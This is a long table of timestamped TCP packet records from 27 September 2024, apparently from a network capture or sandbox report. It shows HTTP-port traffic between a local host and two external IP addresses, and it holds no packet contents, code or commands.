Sep 27, 2024 00:15:07.950534105 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.950535059 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.950546026 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.950550079 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.950556993 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.950567961 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.950577021 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.950582027 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.950587034 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.950598001 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.950608969 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.950613022 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.950620890 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.950630903 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.950630903 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.950642109 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:07.950644970 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:07.950673103 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.051295996 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.051317930 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.051328897 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.051362991 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.051374912 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.051392078 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.051403046 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.051426888 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.051471949 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.051561117 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.051572084 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.051583052 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.051594019 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.051604033 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.051609039 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.051615000 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.051625967 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.051628113 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.051636934 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.051647902 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.051656008 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.051686049 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.051822901 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.051834106 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.051845074 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.051856041 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.051867008 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.051868916 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.051887035 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.051903963 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.052237988 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.052249908 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.052259922 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.052269936 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.052279949 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.052287102 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.052297115 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.052308083 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.052316904 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.052319050 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.052330017 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.052334070 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.052340031 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.052351952 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.052361965 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.052362919 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.052372932 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.052385092 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.052392960 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.052396059 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.052407026 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.052411079 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.052417040 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.052428007 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.052433968 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.052438974 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.052449942 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.052472115 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.052485943 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.052673101 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.052684069 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.052695036 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.052706003 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.052711964 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.052716017 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.052731991 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.052741051 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.052742004 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.052752972 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.052762985 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.052762985 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.052773952 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.052784920 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.052792072 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.052823067 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.052838087 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.053019047 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.053029060 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.053037882 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.053050041 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.053059101 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.053066015 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.053071022 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.053076029 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.053086042 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.053088903 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.053097963 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.053102016 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.053116083 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.053127050 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.053133011 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.053137064 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.053148031 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.053150892 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.053159952 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.053169966 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.053175926 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.053180933 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.053191900 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.053212881 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.053216934 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.053222895 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.053230047 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.053241014 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.053251028 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.053251982 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.053261995 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.053272963 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.053277969 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.053283930 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.053294897 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.053297043 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.053304911 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.053312063 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.053317070 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.053328037 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.053335905 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.053339958 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.053369999 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.053380013 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.054294109 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.054306030 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.054316044 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.054327965 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.054337025 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.054347992 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.054348946 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.054364920 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.054375887 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.054379940 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.054388046 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.054398060 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.054409027 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.054414988 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.054419994 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.054430962 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.054434061 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.054441929 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.054451942 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.054462910 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.054464102 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.054474115 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.054490089 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.054508924 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.122298956 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.122419119 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.153973103 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.161029100 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.327542067 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.327554941 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.327573061 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.327584028 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.327594995 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.327606916 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.327616930 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.327619076 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.327651024 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.327663898 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.327713013 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.327723980 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.327735901 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.327758074 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.327770948 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.327780962 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.327790976 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.327801943 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.327812910 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.327824116 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.327824116 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.327845097 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.327862024 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.327965975 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.327976942 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.327986956 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.327996969 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.328006983 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.328013897 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.328022957 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.328035116 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.328039885 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.328051090 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.328078985 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.328107119 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.328116894 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.328126907 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.328138113 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.328145981 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.328149080 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.328160048 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.328170061 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.328196049 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.328253031 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.328263044 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.328274012 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.328284025 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.328294992 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.328299046 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.328305960 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.328314066 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.328329086 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.328352928 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.328490019 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.328499079 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.328509092 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.328520060 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.328530073 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.328536987 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.328541040 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.328552008 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.328555107 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.328562975 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.328572035 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.328579903 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.328583002 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.328594923 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.328603029 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.328605890 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.328610897 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.328617096 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.328650951 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.328672886 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.328805923 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.328816891 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.328826904 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.328838110 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.328849077 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.328855991 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.328857899 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.328870058 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.328881025 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.328881979 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.328891993 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.328897953 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.328902960 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.328913927 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.328926086 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.328938007 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.328952074 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.328978062 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.328991890 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.329004049 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.329014063 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.329031944 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.329046965 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.329243898 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.329253912 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.329263926 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.329276085 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.329287052 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.329291105 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.329297066 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.329298973 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.329308987 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.329320908 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.329330921 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.329334021 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.329344034 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.329354048 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.329355955 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.329364061 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.329370975 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.329375982 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.329386950 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.329397917 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.329399109 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.329421997 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.329438925 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.329524994 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.329535961 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.329569101 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.497138977 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.497168064 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.501940012 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.502057076 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.803961992 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:08.804018974 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.826977015 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:08.831890106 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:09.001775026 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:09.001849890 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:09.001859903 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:09.001878977 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:09.001914024 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:09.001914024 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:09.004492044 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:09.009474993 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:09.182090044 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:09.182437897 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:09.191745043 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:09.196770906 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:09.371262074 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:09.371345043 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:09.374176979 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:09.379067898 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:09.551532984 CEST	80	49708	46.8.231.109	192.168.2.5
Sep 27, 2024 00:15:09.551647902 CEST	49708	80	192.168.2.5	46.8.231.109
Sep 27, 2024 00:15:09.555231094 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:09.560220957 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:09.560410023 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:09.560471058 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:09.565443993 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.214380980 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.214400053 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.214418888 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.214431047 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.214443922 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.214456081 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.214466095 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.214478016 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.214520931 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.214529037 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.214545012 CEST	80	49709	147.45.44.104	192.168.2.5
Sep 27, 2024 00:15:10.214572906 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.214602947 CEST	49709	80	192.168.2.5	147.45.44.104
Sep 27, 2024 00:15:10.220707893 CEST	80	49709	147.45.44.104	192.168.2.5
